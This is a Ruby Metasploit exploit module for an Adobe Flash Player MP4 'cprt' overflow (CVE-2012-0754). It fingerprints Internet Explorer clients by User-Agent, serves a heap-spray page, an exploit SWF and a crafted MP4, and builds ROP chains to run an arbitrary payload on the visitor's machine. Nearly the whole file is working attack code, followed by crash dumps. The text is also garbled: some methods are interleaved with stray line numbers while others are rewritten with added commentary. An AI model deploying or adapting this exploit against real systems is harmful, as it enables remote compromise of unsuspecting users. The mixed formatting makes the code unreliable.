GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
# Reliability rank this module declares for itself.
Rank = NormalRanking

# Framework mixins. The helper methods this class calls without defining them
# (send_response, get_resource, heaplib, generate_rop_payload, ...) presumably
# come from these -- confirm against the framework sources.
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

# Client profile registered with BrowserAutopwn: a Windows client with
# JavaScript enabled and the ShockwaveFlash.ShockwaveFlash class available.
# NOTE(review): how :method / :classid are probed is decided by the
# BrowserAutopwn mixin, not by anything visible in this file.
autopwn_info({
  :os_name => OperatingSystems::Match::WINDOWS,
  :method => "GetVariable",
  :classid => "ShockwaveFlash.ShockwaveFlash",
  :rank => NormalRanking, # reliable memory corruption
  :javascript => true
})
# Registers the module's metadata with the framework: name, description,
# references, payload constraints and the per-browser target table.
#
# Nothing here talks to the network; the values are only read later by
# get_target, get_payload and on_request_uri.
#
# @param info [Hash] caller-supplied metadata, merged through update_info
def initialize(info={})
  super(update_info(info,
    'Name' => "Adobe Flash Player MP4 'cprt' Overflow",
    'Description' => %q{
This module exploits a vulnerability found in Adobe Flash
Player. By supplying a corrupt .mp4 file loaded by Flash, it
is possible to gain arbitrary remote code execution under the
context of the user.

This vulnerability has been exploited in the wild as part of
the "Iran's Oil and Nuclear Situation.doc" e-mail attack.
According to the advisory, 10.3.183.15 and 11.x before
11.1.102.62 are affected.
},
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'Alexander Gavrun', # Vulnerability discovery
        'sinn3r', # Metasploit module
        'juan vazquez' # Metasploit module
      ],
    # The Adobe bulletin (APSB12-03) listed below is the vendor reference for
    # this CVE; check installed Flash builds against it.
    'References' =>
      [
        [ 'CVE', '2012-0754' ],
        [ 'OSVDB', '79300'],
        [ 'BID', '52034' ],
        [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],
        [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ]
      ],
    # Payload constraints handed to the framework's encoder: at most 1000
    # bytes, no NUL bytes, and no NOP padding added by the framework.
    'Payload' =>
      {
        'Space' => 1000,
        'BadChars' => "\x00",
        'DisableNops' => true
      },
    'DefaultOptions' =>
      {
        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
      },
    'Platform' => 'win',
    # Order matters: get_target refers to these entries by index
    # (targets[1] .. targets[6]); entry 4 is never picked automatically.
    # 'Offset' is a string because on_request_uri interpolates it verbatim
    # into the generated JavaScript.
    'Targets' =>
      [
        # Flash Player 11.1.102.55
        # Flash Player 10.3.183.10
        [ 'Automatic', {} ],
        [
          'IE 6 on Windows XP SP3',
          {
            'Rop' => nil,
            'Offset' => '0x800 - code.length',
            'Ret' => 0x0c0c0c0c
          }
        ],
        [
          'IE 7 on Windows XP SP3',
          {
            'Rop' => nil,
            'Offset' => '0x800 - code.length',
            'Ret' => 0x0c0c0c0c
          }
        ],
        [
          'IE 8 on Windows XP SP3 with msvcrt ROP',
          {
            'Rop' => :msvcrt,
            'Offset' => '0x5f4',
            'Ret' => 0x77c15ed5,
            'ppr' => 0x77C1CAFB
          }
        ],
        [
          'IE 8 on Windows XP SP3 with JRE ROP',
          {
            'Rop' => :jre,
            'Offset' => '0x5f4',
            'Ret' => 0x77c15ed5,
            'ppr' => 0x77C1CAFB
          }
        ],
        [
          'IE 7 on Windows Vista',
          {
            'Rop' => nil,
            'Offset' => '0x5f4',
            'Ret' => 0x0c0c0c0c
          }
        ],
        [
          'IE 8 on Windows 7 SP1',
          {
            'Rop' => :jre,
            'Offset' => '0x5f4',
            'Ret' => 0x7c348b05,
            'ppr' => 0x7c34272e
          }
        ]
      ],
    'Privileged' => false,
    'DisclosureDate' => '2012-02-15',
    'DefaultTarget' => 0))
end
# Produces a random filler value: n random alphabetic characters read back
# as one little-endian 32-bit unsigned integer.
#
# @param n [Integer] number of random characters to generate (default 4)
# @return [Integer, nil] the decoded value; nil when fewer than four
#   characters are available to decode
def junk(n=4)
  dword, = rand_text_alpha(n).unpack("V")
  dword
end
def get_payload(t, cli)
127
128
if t['Rop'].nil?
129
code = ""
130
else
131
#Fix the stack to avoid anything busted
132
code = "\x81\xC4\x54\xF2\xFF\xFF"
133
end
134
code << payload.encoded
135
136
# No rop. Just return the payload.
137
return code if t['Rop'].nil?
138
139
rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'
140
rop_target = (rop_name == 'msvcrt') ? 'xp' : ''
141
142
pivot = [t['ppr']].pack('V*') #POP/POP/RET
143
pivot << [junk].pack('V*')
144
pivot << [t.ret].pack('V*')
145
146
code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
147
return code
148
end
# Chooses the target entry for a client from its User-Agent string.
#
# A target chosen explicitly by the operator always wins. Otherwise the
# User-Agent must contain both a Windows NT version and an MSIE version from
# the table below; the first matching row decides. targets[4] (the JRE ROP
# variant for XP) is never selected automatically.
#
# @param agent [String, nil] the client-supplied User-Agent header value
# @return the matching target entry, or nil when the client is not recognised
def get_target(agent)
  # If the target is already specified by the user, just use that.
  return target unless target.name == 'Automatic'

  # [Windows NT pattern, MSIE pattern, index into targets]
  fingerprints = [
    [/NT 5\.1/, /MSIE 6/, 1], # IE 6 on Windows XP SP3
    [/NT 5\.1/, /MSIE 7/, 2], # IE 7 on Windows XP SP3
    [/NT 5\.1/, /MSIE 8/, 3], # IE 8 on Windows XP SP3
    [/NT 6\.0/, /MSIE 7/, 5], # IE 7 on Windows Vista
    [/NT 6\.1/, /MSIE 8/, 6]  # IE 8 on Windows 7 SP1
  ]

  # Regexp#match? accepts nil, so a request without a User-Agent simply
  # matches nothing.
  hit = fingerprints.find do |os_re, browser_re, _index|
    os_re.match?(agent) && browser_re.match?(agent)
  end

  hit ? targets[hit.last] : nil
end
# Adds the one fixed resource path this module depends on.
#
# The bundled SWF always asks for "/test.mp4", so that path has to be added
# as a resource alongside the module's own URI. For defenders, it is the one
# constant request path this module produces.
def primer
  fixed_path = "/test.mp4"
  hardcoded_uripath(fixed_path)
end
# Entry point: reads the SWF from disk once and keeps it in @swf, then hands
# control to the parent class. on_request_uri serves @swf for every .swf
# request, so the file is not re-read per client.
def exploit
  swf_bytes = create_swf
  @swf = swf_bytes
  super
end
def on_request_uri(cli, request)
180
181
agent = request.headers['User-Agent']
182
my_target = get_target(agent)
183
184
# Avoid the attack if the victim doesn't have the same setup we're targeting
185
if my_target.nil?
186
print_error("Browser not supported: #{agent}")
187
send_not_found(cli)
188
return
189
end
190
191
print_status("Client requesting: #{request.uri}")
192
193
# The SWF requests our MP4 trigger
194
if request.uri =~ /\.mp4$/
195
print_status("Sending MP4...")
196
mp4 = create_mp4(my_target)
197
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
198
return
199
end
200
201
if request.uri =~ /\.swf$/
202
print_status("Sending Exploit SWF")
203
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
204
return
205
end
206
207
p = get_payload(my_target, cli)
208
209
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
210
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
211
randnop = rand_text_alpha(rand(100) + 1)
212
213
js_pivot = <<-JS
214
var heap_obj = new heapLib.ie(0x20000);
215
var code = unescape("#{js_code}");
216
var #{randnop} = "#{js_nops}";
217
var nops = unescape(#{randnop});
218
219
while (nops.length < 0x80000) nops += nops;
220
var offset = nops.substring(0, #{my_target['Offset']});
221
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
222
223
while (shellcode.length < 0x40000) shellcode += shellcode;
224
var block = shellcode.substring(0, (0x80000-6)/2);
225
226
heap_obj.gc();
227
heap_obj.debug(true);
228
for (var i=1; i < 0x1C2; i++) {
229
heap_obj.alloc(block);
230
}
231
heap_obj.debug(true);
232
JS
233
234
js_pivot = heaplib(js_pivot, {:noobfu => true})
235
236
swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
237
swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"
238
239
html = %Q|
240
<html>
241
<head>
242
<script>
243
#{js_pivot}
244
</script>
245
</head>
246
<body>
247
<center>
248
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
249
id="test" width="1" height="1"
250
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
251
<param name="movie" value="#{swf_uri}" />
252
<embed src="#{swf_uri}" quality="high"
253
width="1" height="1" name="test" align="middle"
254
allowNetworking="all"
255
type="application/x-shockwave-flash"
256
pluginspage="http://www.macromedia.com/go/getflashplayer">
257
</embed>
258
259
</object>
260
</center>
261
262
</body>
263
</html>
264
|
265
266
html = html.gsub(/^ {4}/, '')
267
268
print_status("Sending html")
269
send_response(cli, html, {'Content-Type'=>'text/html'})
270
end
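# Loads the prebuilt SWF that ships in the framework's data directory.
#
# File.binread opens, reads and closes in one call, so the descriptor is
# released even when the read raises; the previous open/read/close sequence
# leaked the handle on that path.
#
# @return [String] raw bytes of <data_directory>/exploits/CVE-2012-0754.swf,
#   in binary encoding
# @raise [SystemCallError] e.g. Errno::ENOENT when the file is missing
def create_swf
  path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2012-0754.swf")
  ::File.binread(path)
end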
def create_mp4(target)
282
mp4 = ""
283
mp4 << "\x00\x00\x00\x18"
284
mp4 << "ftypmp42"
285
mp4 << "\x00\x00\x00\x00"
286
mp4 << "mp42isom"
287
mp4 << "\x00\x00\x00\x0D"
288
mp4 << "cprt"
289
mp4 << "\x00\xFF\xFF\xFF"
290
mp4 << "\x00\x00\x00\x00"
291
mp4 << "\x0c\x0c\x0c\x0c" * 2586
292
293
return mp4
294
end
end
=begin
Debugger output at the faulting instruction in two Flash builds. In both,
eax holds 0c0c0c0c and the fault is an indirect call through [eax+8].

C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx

(4b4.1d0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00000000 ecx=0308b1a0 edx=00000004 esi=0308b1a0 edi=00000001
eip=027a2626 esp=0377fec0 ebp=0377ff0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx -
Flash11e+0x52626:
027a2626 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=????????

C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx

(510.9b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000
eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx -
Flash10x+0x48b65:
10048b65 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=????????
=end